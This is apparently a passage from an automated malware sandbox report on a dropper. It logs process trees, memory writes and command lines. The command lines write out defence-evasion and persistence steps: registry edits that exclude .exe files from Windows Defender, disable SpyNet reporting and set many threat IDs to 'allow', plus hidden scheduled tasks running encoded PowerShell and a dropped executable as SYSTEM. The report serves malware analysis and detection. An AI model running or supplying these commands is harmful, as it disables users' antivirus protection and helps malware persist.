N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A
N/A N/A C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\CSaiIME.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1156 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe
PID 1156 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe
PID 1156 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe
PID 1900 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1900 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1900 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1900 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1900 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1900 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4452 wrote to memory of 1088 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4452 wrote to memory of 1088 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4452 wrote to memory of 1088 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2732 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2732 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2352 wrote to memory of 2732 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2732 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2732 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4136 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4136 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1088 wrote to memory of 4136 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2732 wrote to memory of 3860 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2732 wrote to memory of 3860 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2732 wrote to memory of 3860 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 1900 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1028 wrote to memory of 4716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 1028 wrote to memory of 4716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\gpupdate.exe
PID 1900 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1900 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3848 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 4416 N/A C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4416 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4416 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3116 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3116 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3116 wrote to memory of 960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 1436 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 1436 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 1436 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3012 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 3448 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 4228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4416 wrote to memory of 4228 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe

"C:\Users\Admin\AppData\Local\Temp\4b72c7d3c7931614c38cca2b224b56206b7ac1207c2a2a5fb9ca97608c342ded.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6968.tmp\Install.exe

.\Install.exe /zkizdidrXl "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "giYLIiWYa" /SC once /ST 01:13:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "giYLIiWYa"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "giYLIiWYa"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 10:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe\" hl /Lssite_idOGH 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\ZyxyzYS.exe hl /Lssite_idOGH 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

